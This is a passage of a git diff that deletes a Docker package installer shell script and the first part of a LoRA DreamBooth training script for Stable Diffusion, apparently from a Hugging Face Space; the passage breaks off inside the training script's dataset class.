-# Available mirrors are "Aliyun" (https://mirrors.aliyun.com/docker-ce), and -# "AzureChinaCloud" (https://mirror.azure.cn/docker-ce), for example: -# -# $ sudo sh install-docker.sh --mirror AzureChinaCloud -# -# ============================================================================== - - -# Git commit from https://github.com/docker/docker-install when -# the script was uploaded (Should only be modified by upload job): -SCRIPT_COMMIT_SHA="e5543d473431b782227f8908005543bb4389b8de" - -# strip "v" prefix if present -VERSION="${VERSION#v}" - -# The channel to install from: -# * stable -# * test -# * edge (deprecated) -# * nightly (deprecated) -DEFAULT_CHANNEL_VALUE="test" -if [ -z "$CHANNEL" ]; then - CHANNEL=$DEFAULT_CHANNEL_VALUE -fi - -DEFAULT_DOWNLOAD_URL="https://download.docker.com" -if [ -z "$DOWNLOAD_URL" ]; then - DOWNLOAD_URL=$DEFAULT_DOWNLOAD_URL -fi - -DEFAULT_REPO_FILE="docker-ce.repo" -if [ -z "$REPO_FILE" ]; then - REPO_FILE="$DEFAULT_REPO_FILE" -fi - -mirror='' -DRY_RUN=${DRY_RUN:-} -while [ $# -gt 0 ]; do - case "$1" in - --channel) - CHANNEL="$2" - shift - ;; - --dry-run) - DRY_RUN=1 - ;; - --mirror) - mirror="$2" - shift - ;; - --version) - VERSION="${2#v}" - shift - ;; - --*) - echo "Illegal option $1" - ;; - esac - shift $(( $# > 0 ? 1 : 0 )) -done - -case "$mirror" in - Aliyun) - DOWNLOAD_URL="https://mirrors.aliyun.com/docker-ce" - ;; - AzureChinaCloud) - DOWNLOAD_URL="https://mirror.azure.cn/docker-ce" - ;; - "") - ;; - *) - >&2 echo "unknown mirror '$mirror': use either 'Aliyun', or 'AzureChinaCloud'." - exit 1 - ;; -esac - -case "$CHANNEL" in - stable|test) - ;; - edge|nightly) - >&2 echo "DEPRECATED: the $CHANNEL channel has been deprecated and is no longer supported by this script." - exit 1 - ;; - *) - >&2 echo "unknown CHANNEL '$CHANNEL': use either stable or test." - exit 1 - ;; -esac - -command_exists() { - command -v "$@" > /dev/null 2>&1 -} - -# version_gte checks if the version specified in $VERSION is at least the given -# SemVer (Maj.Minor[.Patch]), or CalVer (YY.MM) version.It returns 0 (success) -# if $VERSION is either unset (=latest) or newer or equal than the specified -# version, or returns 1 (fail) otherwise. -# -# examples: -# -# VERSION=23.0 -# version_gte 23.0 // 0 (success) -# version_gte 20.10 // 0 (success) -# version_gte 19.03 // 0 (success) -# version_gte 21.10 // 1 (fail) -version_gte() { - if [ -z "$VERSION" ]; then - return 0 - fi - eval version_compare "$VERSION" "$1" -} - -# version_compare compares two version strings (either SemVer (Major.Minor.Path), -# or CalVer (YY.MM) version strings. It returns 0 (success) if version A is newer -# or equal than version B, or 1 (fail) otherwise. Patch releases and pre-release -# (-alpha/-beta) are not taken into account -# -# examples: -# -# version_compare 23.0.0 20.10 // 0 (success) -# version_compare 23.0 20.10 // 0 (success) -# version_compare 20.10 19.03 // 0 (success) -# version_compare 20.10 20.10 // 0 (success) -# version_compare 19.03 20.10 // 1 (fail) -version_compare() ( - set +x - - yy_a="$(echo "$1" | cut -d'.' -f1)" - yy_b="$(echo "$2" | cut -d'.' -f1)" - if [ "$yy_a" -lt "$yy_b" ]; then - return 1 - fi - if [ "$yy_a" -gt "$yy_b" ]; then - return 0 - fi - mm_a="$(echo "$1" | cut -d'.' -f2)" - mm_b="$(echo "$2" | cut -d'.' 
-f2)" - - # trim leading zeros to accommodate CalVer - mm_a="${mm_a#0}" - mm_b="${mm_b#0}" - - if [ "${mm_a:-0}" -lt "${mm_b:-0}" ]; then - return 1 - fi - - return 0 -) - -is_dry_run() { - if [ -z "$DRY_RUN" ]; then - return 1 - else - return 0 - fi -} - -is_wsl() { - case "$(uname -r)" in - *microsoft* ) true ;; # WSL 2 - *Microsoft* ) true ;; # WSL 1 - * ) false;; - esac -} - -is_darwin() { - case "$(uname -s)" in - *darwin* ) true ;; - *Darwin* ) true ;; - * ) false;; - esac -} - -deprecation_notice() { - distro=$1 - distro_version=$2 - echo - printf "\033[91;1mDEPRECATION WARNING\033[0m\n" - printf " This Linux distribution (\033[1m%s %s\033[0m) reached end-of-life and is no longer supported by this script.\n" "$distro" "$distro_version" - echo " No updates or security fixes will be released for this distribution, and users are recommended" - echo " to upgrade to a currently maintained version of $distro." - echo - printf "Press \033[1mCtrl+C\033[0m now to abort this script, or wait for the installation to continue." - echo - sleep 10 -} - -get_distribution() { - lsb_dist="" - # Every system that we officially support has /etc/os-release - if [ -r /etc/os-release ]; then - lsb_dist="$(. /etc/os-release && echo "$ID")" - fi - # Returning an empty string here should be alright since the - # case statements don't act unless you provide an actual value - echo "$lsb_dist" -} - -echo_docker_as_nonroot() { - if is_dry_run; then - return - fi - if command_exists docker && [ -e /var/run/docker.sock ]; then - ( - set -x - $sh_c 'docker version' - ) || true - fi - - # intentionally mixed spaces and tabs here -- tabs are stripped by "<<-EOF", spaces are kept in the output - echo - echo "================================================================================" - echo - if version_gte "20.10"; then - echo "To run Docker as a non-privileged user, consider setting up the" - echo "Docker daemon in rootless mode for your user:" - echo - echo " dockerd-rootless-setuptool.sh install" - echo - echo "Visit https://docs.docker.com/go/rootless/ to learn about rootless mode." - echo - fi - echo - echo "To run the Docker daemon as a fully privileged service, but granting non-root" - echo "users access, refer to https://docs.docker.com/go/daemon-access/" - echo - echo "WARNING: Access to the remote API on a privileged Docker daemon is equivalent" - echo " to root access on the host. Refer to the 'Docker daemon attack surface'" - echo " documentation for details: https://docs.docker.com/go/attack-surface/" - echo - echo "================================================================================" - echo -} - -# Check if this is a forked Linux distro -check_forked() { - - # Check for lsb_release command existence, it usually exists in forked distros - if command_exists lsb_release; then - # Check if the `-u` option is supported - set +e - lsb_release -a -u > /dev/null 2>&1 - lsb_release_exit_code=$? - set -e - - # Check if the command has exited successfully, it means we're in a forked distro - if [ "$lsb_release_exit_code" = "0" ]; then - # Print info about current distro - cat <<-EOF - You're using '$lsb_dist' version '$dist_version'. 
- EOF - - # Get the upstream release info - lsb_dist=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'id' | cut -d ':' -f 2 | tr -d '[:space:]') - dist_version=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'codename' | cut -d ':' -f 2 | tr -d '[:space:]') - - # Print info about upstream distro - cat <<-EOF - Upstream release is '$lsb_dist' version '$dist_version'. - EOF - else - if [ -r /etc/debian_version ] && [ "$lsb_dist" != "ubuntu" ] && [ "$lsb_dist" != "raspbian" ]; then - if [ "$lsb_dist" = "osmc" ]; then - # OSMC runs Raspbian - lsb_dist=raspbian - else - # We're Debian and don't even know it! - lsb_dist=debian - fi - dist_version="$(sed 's/\/.*//' /etc/debian_version | sed 's/\..*//')" - case "$dist_version" in - 12) - dist_version="bookworm" - ;; - 11) - dist_version="bullseye" - ;; - 10) - dist_version="buster" - ;; - 9) - dist_version="stretch" - ;; - 8) - dist_version="jessie" - ;; - esac - fi - fi - fi -} - -do_install() { - echo "# Executing docker install script, commit: $SCRIPT_COMMIT_SHA" - - if command_exists docker; then - cat >&2 <<-'EOF' - Warning: the "docker" command appears to already exist on this system. - - If you already have Docker installed, this script can cause trouble, which is - why we're displaying this warning and provide the opportunity to cancel the - installation. - - If you installed the current Docker package using this script and are using it - again to update Docker, you can safely ignore this message. - - You may press Ctrl+C now to abort this script. - EOF - ( set -x; sleep 20 ) - fi - - user="$(id -un 2>/dev/null || true)" - - sh_c='sh -c' - if [ "$user" != 'root' ]; then - if command_exists sudo; then - sh_c='sudo -E sh -c' - elif command_exists su; then - sh_c='su -c' - else - cat >&2 <<-'EOF' - Error: this installer needs the ability to run commands as root. - We are unable to find either "sudo" or "su" available to make this happen. - EOF - exit 1 - fi - fi - - if is_dry_run; then - sh_c="echo" - fi - - # perform some very rudimentary platform detection - lsb_dist=$( get_distribution ) - lsb_dist="$(echo "$lsb_dist" | tr '[:upper:]' '[:lower:]')" - - if is_wsl; then - echo - echo "WSL DETECTED: We recommend using Docker Desktop for Windows." - echo "Please get Docker Desktop from https://www.docker.com/products/docker-desktop/" - echo - cat >&2 <<-'EOF' - - You may press Ctrl+C now to abort this script. - EOF - ( set -x; sleep 20 ) - fi - - case "$lsb_dist" in - - ubuntu) - if command_exists lsb_release; then - dist_version="$(lsb_release --codename | cut -f2)" - fi - if [ -z "$dist_version" ] && [ -r /etc/lsb-release ]; then - dist_version="$(. /etc/lsb-release && echo "$DISTRIB_CODENAME")" - fi - ;; - - debian|raspbian) - dist_version="$(sed 's/\/.*//' /etc/debian_version | sed 's/\..*//')" - case "$dist_version" in - 12) - dist_version="bookworm" - ;; - 11) - dist_version="bullseye" - ;; - 10) - dist_version="buster" - ;; - 9) - dist_version="stretch" - ;; - 8) - dist_version="jessie" - ;; - esac - ;; - - centos|rhel|sles) - if [ -z "$dist_version" ] && [ -r /etc/os-release ]; then - dist_version="$(. /etc/os-release && echo "$VERSION_ID")" - fi - ;; - - *) - if command_exists lsb_release; then - dist_version="$(lsb_release --release | cut -f2)" - fi - if [ -z "$dist_version" ] && [ -r /etc/os-release ]; then - dist_version="$(. 
/etc/os-release && echo "$VERSION_ID")" - fi - ;; - - esac - - # Check if this is a forked Linux distro - check_forked - - # Print deprecation warnings for distro versions that recently reached EOL, - # but may still be commonly used (especially LTS versions). - case "$lsb_dist.$dist_version" in - debian.stretch|debian.jessie) - deprecation_notice "$lsb_dist" "$dist_version" - ;; - raspbian.stretch|raspbian.jessie) - deprecation_notice "$lsb_dist" "$dist_version" - ;; - ubuntu.xenial|ubuntu.trusty) - deprecation_notice "$lsb_dist" "$dist_version" - ;; - ubuntu.impish|ubuntu.hirsute|ubuntu.groovy|ubuntu.eoan|ubuntu.disco|ubuntu.cosmic) - deprecation_notice "$lsb_dist" "$dist_version" - ;; - fedora.*) - if [ "$dist_version" -lt 36 ]; then - deprecation_notice "$lsb_dist" "$dist_version" - fi - ;; - esac - - # Run setup for each distro accordingly - case "$lsb_dist" in - ubuntu|debian|raspbian) - pre_reqs="apt-transport-https ca-certificates curl" - if ! command -v gpg > /dev/null; then - pre_reqs="$pre_reqs gnupg" - fi - apt_repo="deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] $DOWNLOAD_URL/linux/$lsb_dist $dist_version $CHANNEL" - ( - if ! is_dry_run; then - set -x - fi - $sh_c 'apt-get update -qq >/dev/null' - $sh_c "DEBIAN_FRONTEND=noninteractive apt-get install -y -qq $pre_reqs >/dev/null" - $sh_c 'install -m 0755 -d /etc/apt/keyrings' - $sh_c "curl -fsSL \"$DOWNLOAD_URL/linux/$lsb_dist/gpg\" | gpg --dearmor --yes -o /etc/apt/keyrings/docker.gpg" - $sh_c "chmod a+r /etc/apt/keyrings/docker.gpg" - $sh_c "echo \"$apt_repo\" > /etc/apt/sources.list.d/docker.list" - $sh_c 'apt-get update -qq >/dev/null' - ) - pkg_version="" - if [ -n "$VERSION" ]; then - if is_dry_run; then - echo "# WARNING: VERSION pinning is not supported in DRY_RUN" - else - # Will work for incomplete versions IE (17.12), but may not actually grab the "latest" if in the test channel - pkg_pattern="$(echo "$VERSION" | sed 's/-ce-/~ce~.*/g' | sed 's/-/.*/g')" - search_command="apt-cache madison docker-ce | grep '$pkg_pattern' | head -1 | awk '{\$1=\$1};1' | cut -d' ' -f 3" - pkg_version="$($sh_c "$search_command")" - echo "INFO: Searching repository for VERSION '$VERSION'" - echo "INFO: $search_command" - if [ -z "$pkg_version" ]; then - echo - echo "ERROR: '$VERSION' not found amongst apt-cache madison results" - echo - exit 1 - fi - if version_gte "18.09"; then - search_command="apt-cache madison docker-ce-cli | grep '$pkg_pattern' | head -1 | awk '{\$1=\$1};1' | cut -d' ' -f 3" - echo "INFO: $search_command" - cli_pkg_version="=$($sh_c "$search_command")" - fi - pkg_version="=$pkg_version" - fi - fi - ( - pkgs="docker-ce${pkg_version%=}" - if version_gte "18.09"; then - # older versions didn't ship the cli and containerd as separate packages - pkgs="$pkgs docker-ce-cli${cli_pkg_version%=} containerd.io" - fi - if version_gte "20.10"; then - pkgs="$pkgs docker-compose-plugin docker-ce-rootless-extras$pkg_version" - fi - if version_gte "23.0"; then - pkgs="$pkgs docker-buildx-plugin" - fi - if ! is_dry_run; then - set -x - fi - $sh_c "DEBIAN_FRONTEND=noninteractive apt-get install -y -qq $pkgs >/dev/null" - ) - echo_docker_as_nonroot - exit 0 - ;; - centos|fedora|rhel) - if [ "$(uname -m)" != "s390x" ] && [ "$lsb_dist" = "rhel" ]; then - echo "Packages for RHEL are currently only available for s390x." 
- exit 1 - fi - if [ "$lsb_dist" = "fedora" ]; then - pkg_manager="dnf" - config_manager="dnf config-manager" - enable_channel_flag="--set-enabled" - disable_channel_flag="--set-disabled" - pre_reqs="dnf-plugins-core" - pkg_suffix="fc$dist_version" - else - pkg_manager="yum" - config_manager="yum-config-manager" - enable_channel_flag="--enable" - disable_channel_flag="--disable" - pre_reqs="yum-utils" - pkg_suffix="el" - fi - repo_file_url="$DOWNLOAD_URL/linux/$lsb_dist/$REPO_FILE" - ( - if ! is_dry_run; then - set -x - fi - $sh_c "$pkg_manager install -y -q $pre_reqs" - $sh_c "$config_manager --add-repo $repo_file_url" - - if [ "$CHANNEL" != "stable" ]; then - $sh_c "$config_manager $disable_channel_flag 'docker-ce-*'" - $sh_c "$config_manager $enable_channel_flag 'docker-ce-$CHANNEL'" - fi - $sh_c "$pkg_manager makecache" - ) - pkg_version="" - if [ -n "$VERSION" ]; then - if is_dry_run; then - echo "# WARNING: VERSION pinning is not supported in DRY_RUN" - else - pkg_pattern="$(echo "$VERSION" | sed 's/-ce-/\\\\.ce.*/g' | sed 's/-/.*/g').*$pkg_suffix" - search_command="$pkg_manager list --showduplicates docker-ce | grep '$pkg_pattern' | tail -1 | awk '{print \$2}'" - pkg_version="$($sh_c "$search_command")" - echo "INFO: Searching repository for VERSION '$VERSION'" - echo "INFO: $search_command" - if [ -z "$pkg_version" ]; then - echo - echo "ERROR: '$VERSION' not found amongst $pkg_manager list results" - echo - exit 1 - fi - if version_gte "18.09"; then - # older versions don't support a cli package - search_command="$pkg_manager list --showduplicates docker-ce-cli | grep '$pkg_pattern' | tail -1 | awk '{print \$2}'" - cli_pkg_version="$($sh_c "$search_command" | cut -d':' -f 2)" - fi - # Cut out the epoch and prefix with a '-' - pkg_version="-$(echo "$pkg_version" | cut -d':' -f 2)" - fi - fi - ( - pkgs="docker-ce$pkg_version" - if version_gte "18.09"; then - # older versions didn't ship the cli and containerd as separate packages - if [ -n "$cli_pkg_version" ]; then - pkgs="$pkgs docker-ce-cli-$cli_pkg_version containerd.io" - else - pkgs="$pkgs docker-ce-cli containerd.io" - fi - fi - if version_gte "20.10"; then - pkgs="$pkgs docker-compose-plugin docker-ce-rootless-extras$pkg_version" - fi - if version_gte "23.0"; then - pkgs="$pkgs docker-buildx-plugin" - fi - if ! is_dry_run; then - set -x - fi - $sh_c "$pkg_manager install -y -q $pkgs" - ) - echo_docker_as_nonroot - exit 0 - ;; - sles) - if [ "$(uname -m)" != "s390x" ]; then - echo "Packages for SLES are currently only available for s390x" - exit 1 - fi - if [ "$dist_version" = "15.3" ]; then - sles_version="SLE_15_SP3" - else - sles_minor_version="${dist_version##*.}" - sles_version="15.$sles_minor_version" - fi - repo_file_url="$DOWNLOAD_URL/linux/$lsb_dist/$REPO_FILE" - pre_reqs="ca-certificates curl libseccomp2 awk" - ( - if ! is_dry_run; then - set -x - fi - $sh_c "zypper install -y $pre_reqs" - $sh_c "zypper addrepo $repo_file_url" - if ! is_dry_run; then - cat >&2 <<-'EOF' - WARNING!! - openSUSE repository (https://download.opensuse.org/repositories/security:SELinux) will be enabled now. - Do you wish to continue? - You may press Ctrl+C now to abort this script. 
- EOF - ( set -x; sleep 30 ) - fi - opensuse_repo="https://download.opensuse.org/repositories/security:SELinux/$sles_version/security:SELinux.repo" - $sh_c "zypper addrepo $opensuse_repo" - $sh_c "zypper --gpg-auto-import-keys refresh" - $sh_c "zypper lr -d" - ) - pkg_version="" - if [ -n "$VERSION" ]; then - if is_dry_run; then - echo "# WARNING: VERSION pinning is not supported in DRY_RUN" - else - pkg_pattern="$(echo "$VERSION" | sed 's/-ce-/\\\\.ce.*/g' | sed 's/-/.*/g')" - search_command="zypper search -s --match-exact 'docker-ce' | grep '$pkg_pattern' | tail -1 | awk '{print \$6}'" - pkg_version="$($sh_c "$search_command")" - echo "INFO: Searching repository for VERSION '$VERSION'" - echo "INFO: $search_command" - if [ -z "$pkg_version" ]; then - echo - echo "ERROR: '$VERSION' not found amongst zypper list results" - echo - exit 1 - fi - search_command="zypper search -s --match-exact 'docker-ce-cli' | grep '$pkg_pattern' | tail -1 | awk '{print \$6}'" - # It's okay for cli_pkg_version to be blank, since older versions don't support a cli package - cli_pkg_version="$($sh_c "$search_command")" - pkg_version="-$pkg_version" - fi - fi - ( - pkgs="docker-ce$pkg_version" - if version_gte "18.09"; then - if [ -n "$cli_pkg_version" ]; then - # older versions didn't ship the cli and containerd as separate packages - pkgs="$pkgs docker-ce-cli-$cli_pkg_version containerd.io" - else - pkgs="$pkgs docker-ce-cli containerd.io" - fi - fi - if version_gte "20.10"; then - pkgs="$pkgs docker-compose-plugin docker-ce-rootless-extras$pkg_version" - fi - if version_gte "23.0"; then - pkgs="$pkgs docker-buildx-plugin" - fi - if ! is_dry_run; then - set -x - fi - $sh_c "zypper -q install -y $pkgs" - ) - echo_docker_as_nonroot - exit 0 - ;; - *) - if [ -z "$lsb_dist" ]; then - if is_darwin; then - echo - echo "ERROR: Unsupported operating system 'macOS'" - echo "Please get Docker Desktop from https://www.docker.com/products/docker-desktop" - echo - exit 1 - fi - fi - echo - echo "ERROR: Unsupported distribution '$lsb_dist'" - echo - exit 1 - ;; - esac - exit 1 -} - -# wrapped up in a function so that we have some protection against only getting -# half the file during "curl | sh" -do_install diff --git a/spaces/luodian/LoRA-DreamBooth-Training-UI/train_dreambooth_lora.py b/spaces/luodian/LoRA-DreamBooth-Training-UI/train_dreambooth_lora.py deleted file mode 100644 index 93d429590ca4f357aff07989965b673bdf1e50fe..0000000000000000000000000000000000000000 --- a/spaces/luodian/LoRA-DreamBooth-Training-UI/train_dreambooth_lora.py +++ /dev/null @@ -1,1026 +0,0 @@ -#!/usr/bin/env python -# coding=utf-8 -# -# This file is adapted from https://github.com/huggingface/diffusers/blob/febaf863026bd014b7a14349336544fc109d0f57/examples/dreambooth/train_dreambooth_lora.py -# The original license is as below: -# -# Copyright 2022 The HuggingFace Inc. team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
-# See the License for the specific language governing permissions and - -import argparse -import hashlib -import logging -import math -import os -import warnings -from pathlib import Path -from typing import Optional - -import numpy as np -import torch -import torch.nn.functional as F -import torch.utils.checkpoint -from torch.utils.data import Dataset - -import datasets -import diffusers -import transformers -from accelerate import Accelerator -from accelerate.logging import get_logger -from accelerate.utils import set_seed -from diffusers import ( - AutoencoderKL, - DDPMScheduler, - DiffusionPipeline, - DPMSolverMultistepScheduler, - UNet2DConditionModel, -) -from diffusers.loaders import AttnProcsLayers -from diffusers.models.cross_attention import LoRACrossAttnProcessor -from diffusers.optimization import get_scheduler -from diffusers.utils import check_min_version, is_wandb_available -from diffusers.utils.import_utils import is_xformers_available -from huggingface_hub import HfFolder, Repository, create_repo, whoami -from PIL import Image -from torchvision import transforms -from tqdm.auto import tqdm -from transformers import AutoTokenizer, PretrainedConfig - - -# Will error if the minimal version of diffusers is not installed. Remove at your own risks. -check_min_version("0.12.0.dev0") - -logger = get_logger(__name__) - - -def save_model_card(repo_name, images=None, base_model=str, prompt=str, repo_folder=None): - img_str = "" - for i, image in enumerate(images): - image.save(os.path.join(repo_folder, f"image_{i}.png")) - img_str += f"![img_{i}](./image_{i}.png)\n" - - yaml = f""" ---- -license: creativeml-openrail-m -base_model: {base_model} -tags: -- stable-diffusion -- stable-diffusion-diffusers -- text-to-image -- diffusers -- lora -inference: true ---- - """ - model_card = f""" -# LoRA DreamBooth - {repo_name} - -These are LoRA adaption weights for {repo_name}. The weights were trained on {prompt} using [DreamBooth](https://dreambooth.github.io/). You can find some example images in the following. 
\n -{img_str} -""" - with open(os.path.join(repo_folder, "README.md"), "w") as f: - f.write(yaml + model_card) - - -def import_model_class_from_model_name_or_path(pretrained_model_name_or_path: str, revision: str): - text_encoder_config = PretrainedConfig.from_pretrained( - pretrained_model_name_or_path, - subfolder="text_encoder", - revision=revision, - ) - model_class = text_encoder_config.architectures[0] - - if model_class == "CLIPTextModel": - from transformers import CLIPTextModel - - return CLIPTextModel - elif model_class == "RobertaSeriesModelWithTransformation": - from diffusers.pipelines.alt_diffusion.modeling_roberta_series import RobertaSeriesModelWithTransformation - - return RobertaSeriesModelWithTransformation - else: - raise ValueError(f"{model_class} is not supported.") - - -def parse_args(input_args=None): - parser = argparse.ArgumentParser(description="Simple example of a training script.") - parser.add_argument( - "--pretrained_model_name_or_path", - type=str, - default=None, - required=True, - help="Path to pretrained model or model identifier from huggingface.co/models.", - ) - parser.add_argument( - "--revision", - type=str, - default=None, - required=False, - help="Revision of pretrained model identifier from huggingface.co/models.", - ) - parser.add_argument( - "--tokenizer_name", - type=str, - default=None, - help="Pretrained tokenizer name or path if not the same as model_name", - ) - parser.add_argument( - "--instance_data_dir", - type=str, - default=None, - required=True, - help="A folder containing the training data of instance images.", - ) - parser.add_argument( - "--class_data_dir", - type=str, - default=None, - required=False, - help="A folder containing the training data of class images.", - ) - parser.add_argument( - "--instance_prompt", - type=str, - default=None, - required=True, - help="The prompt with identifier specifying the instance", - ) - parser.add_argument( - "--class_prompt", - type=str, - default=None, - help="The prompt to specify images in the same class as provided instance images.", - ) - parser.add_argument( - "--validation_prompt", - type=str, - default=None, - help="A prompt that is used during validation to verify that the model is learning.", - ) - parser.add_argument( - "--num_validation_images", - type=int, - default=4, - help="Number of images that should be generated during validation with `validation_prompt`.", - ) - parser.add_argument( - "--validation_epochs", - type=int, - default=50, - help=( - "Run dreambooth validation every X epochs. Dreambooth validation consists of running the prompt" - " `args.validation_prompt` multiple times: `args.num_validation_images`." - ), - ) - parser.add_argument( - "--with_prior_preservation", - default=False, - action="store_true", - help="Flag to add prior preservation loss.", - ) - parser.add_argument("--prior_loss_weight", type=float, default=1.0, help="The weight of prior preservation loss.") - parser.add_argument( - "--num_class_images", - type=int, - default=100, - help=( - "Minimal class images for prior preservation loss. If there are not enough images already present in" - " class_data_dir, additional images will be sampled with class_prompt." 
- ), - ) - parser.add_argument( - "--output_dir", - type=str, - default="lora-dreambooth-model", - help="The output directory where the model predictions and checkpoints will be written.", - ) - parser.add_argument("--seed", type=int, default=None, help="A seed for reproducible training.") - parser.add_argument( - "--resolution", - type=int, - default=512, - help=( - "The resolution for input images, all the images in the train/validation dataset will be resized to this" - " resolution" - ), - ) - parser.add_argument( - "--center_crop", - default=False, - action="store_true", - help=( - "Whether to center crop the input images to the resolution. If not set, the images will be randomly" - " cropped. The images will be resized to the resolution first before cropping." - ), - ) - parser.add_argument( - "--train_batch_size", type=int, default=4, help="Batch size (per device) for the training dataloader." - ) - parser.add_argument( - "--sample_batch_size", type=int, default=4, help="Batch size (per device) for sampling images." - ) - parser.add_argument("--num_train_epochs", type=int, default=1) - parser.add_argument( - "--max_train_steps", - type=int, - default=None, - help="Total number of training steps to perform. If provided, overrides num_train_epochs.", - ) - parser.add_argument( - "--checkpointing_steps", - type=int, - default=500, - help=( - "Save a checkpoint of the training state every X updates. These checkpoints can be used both as final" - " checkpoints in case they are better than the last checkpoint, and are also suitable for resuming" - " training using `--resume_from_checkpoint`." - ), - ) - parser.add_argument( - "--resume_from_checkpoint", - type=str, - default=None, - help=( - "Whether training should be resumed from a previous checkpoint. Use a path saved by" - ' `--checkpointing_steps`, or `"latest"` to automatically select the last available checkpoint.' - ), - ) - parser.add_argument( - "--gradient_accumulation_steps", - type=int, - default=1, - help="Number of updates steps to accumulate before performing a backward/update pass.", - ) - parser.add_argument( - "--gradient_checkpointing", - action="store_true", - help="Whether or not to use gradient checkpointing to save memory at the expense of slower backward pass.", - ) - parser.add_argument( - "--learning_rate", - type=float, - default=5e-4, - help="Initial learning rate (after the potential warmup period) to use.", - ) - parser.add_argument( - "--scale_lr", - action="store_true", - default=False, - help="Scale the learning rate by the number of GPUs, gradient accumulation steps, and batch size.", - ) - parser.add_argument( - "--lr_scheduler", - type=str, - default="constant", - help=( - 'The scheduler type to use. Choose between ["linear", "cosine", "cosine_with_restarts", "polynomial",' - ' "constant", "constant_with_warmup"]' - ), - ) - parser.add_argument( - "--lr_warmup_steps", type=int, default=500, help="Number of steps for the warmup in the lr scheduler." - ) - parser.add_argument( - "--lr_num_cycles", - type=int, - default=1, - help="Number of hard resets of the lr in cosine_with_restarts scheduler.", - ) - parser.add_argument("--lr_power", type=float, default=1.0, help="Power factor of the polynomial scheduler.") - parser.add_argument( - "--dataloader_num_workers", - type=int, - default=0, - help=( - "Number of subprocesses to use for data loading. 0 means that the data will be loaded in the main process." 
- ), - ) - parser.add_argument( - "--use_8bit_adam", action="store_true", help="Whether or not to use 8-bit Adam from bitsandbytes." - ) - parser.add_argument("--adam_beta1", type=float, default=0.9, help="The beta1 parameter for the Adam optimizer.") - parser.add_argument("--adam_beta2", type=float, default=0.999, help="The beta2 parameter for the Adam optimizer.") - parser.add_argument("--adam_weight_decay", type=float, default=1e-2, help="Weight decay to use.") - parser.add_argument("--adam_epsilon", type=float, default=1e-08, help="Epsilon value for the Adam optimizer") - parser.add_argument("--max_grad_norm", default=1.0, type=float, help="Max gradient norm.") - parser.add_argument("--push_to_hub", action="store_true", help="Whether or not to push the model to the Hub.") - parser.add_argument("--hub_token", type=str, default=None, help="The token to use to push to the Model Hub.") - parser.add_argument( - "--hub_model_id", - type=str, - default=None, - help="The name of the repository to keep in sync with the local `output_dir`.", - ) - parser.add_argument( - "--logging_dir", - type=str, - default="logs", - help=( - "[TensorBoard](https://www.tensorflow.org/tensorboard) log directory. Will default to" - " *output_dir/runs/**CURRENT_DATETIME_HOSTNAME***." - ), - ) - parser.add_argument( - "--allow_tf32", - action="store_true", - help=( - "Whether or not to allow TF32 on Ampere GPUs. Can be used to speed up training. For more information, see" - " https://pytorch.org/docs/stable/notes/cuda.html#tensorfloat-32-tf32-on-ampere-devices" - ), - ) - parser.add_argument( - "--report_to", - type=str, - default="tensorboard", - help=( - 'The integration to report the results and logs to. Supported platforms are `"tensorboard"`' - ' (default), `"wandb"` and `"comet_ml"`. Use `"all"` to report to all integrations.' - ), - ) - parser.add_argument( - "--mixed_precision", - type=str, - default=None, - choices=["no", "fp16", "bf16"], - help=( - "Whether to use mixed precision. Choose between fp16 and bf16 (bfloat16). Bf16 requires PyTorch >=" - " 1.10.and an Nvidia Ampere GPU. Default to the value of accelerate config of the current system or the" - " flag passed with the `accelerate.launch` command. Use this argument to override the accelerate config." - ), - ) - parser.add_argument( - "--prior_generation_precision", - type=str, - default=None, - choices=["no", "fp32", "fp16", "bf16"], - help=( - "Choose prior generation precision between fp32, fp16 and bf16 (bfloat16). Bf16 requires PyTorch >=" - " 1.10.and an Nvidia Ampere GPU. Default to fp16 if a GPU is available else fp32." - ), - ) - parser.add_argument("--local_rank", type=int, default=-1, help="For distributed training: local_rank") - parser.add_argument( - "--enable_xformers_memory_efficient_attention", action="store_true", help="Whether or not to use xformers." 
- ) - - if input_args is not None: - args = parser.parse_args(input_args) - else: - args = parser.parse_args() - - env_local_rank = int(os.environ.get("LOCAL_RANK", -1)) - if env_local_rank != -1 and env_local_rank != args.local_rank: - args.local_rank = env_local_rank - - if args.with_prior_preservation: - if args.class_data_dir is None: - raise ValueError("You must specify a data directory for class images.") - if args.class_prompt is None: - raise ValueError("You must specify prompt for class images.") - else: - # logger is not available yet - if args.class_data_dir is not None: - warnings.warn("You need not use --class_data_dir without --with_prior_preservation.") - if args.class_prompt is not None: - warnings.warn("You need not use --class_prompt without --with_prior_preservation.") - - return args - - -class DreamBoothDataset(Dataset): - """ - A dataset to prepare the instance and class images with the prompts for fine-tuning the model. - It pre-processes the images and the tokenizes prompts. - """ - - def __init__( - self, - instance_data_root, - instance_prompt, - tokenizer, - class_data_root=None, - class_prompt=None, - size=512, - center_crop=False, - ): - self.size = size - self.center_crop = center_crop - self.tokenizer = tokenizer - - self.instance_data_root = Path(instance_data_root) - if not self.instance_data_root.exists(): - raise ValueError("Instance images root doesn't exists.") - - self.instance_images_path = list(Path(instance_data_root).iterdir()) - self.num_instance_images = len(self.instance_images_path) - self.instance_prompt = instance_prompt - self._length = self.num_instance_images - - if class_data_root is not None: - self.class_data_root = Path(class_data_root) - self.class_data_root.mkdir(parents=True, exist_ok=True) - self.class_images_path = list(self.class_data_root.iterdir()) - self.num_class_images = len(self.class_images_path) - self._length = max(self.num_class_images, self.num_instance_images) - self.class_prompt = class_prompt - else: - self.class_data_root = None - - self.image_transforms = transforms.Compose( - [ - transforms.Resize(size, interpolation=transforms.InterpolationMode.BILINEAR), - transforms.CenterCrop(size) if center_crop else transforms.RandomCrop(size), - transforms.ToTensor(), - transforms.Normalize([0.5], [0.5]), - ] - ) - - def __len__(self): - return self._length - - def __getitem__(self, index): - example = {} - instance_image = Image.open(self.instance_images_path[index % self.num_instance_images]) - if not instance_image.mode == "RGB": - instance_image = instance_image.convert("RGB") - example["instance_images"] = self.image_transforms(instance_image) - example["instance_prompt_ids"] = self.tokenizer( - self.instance_prompt, 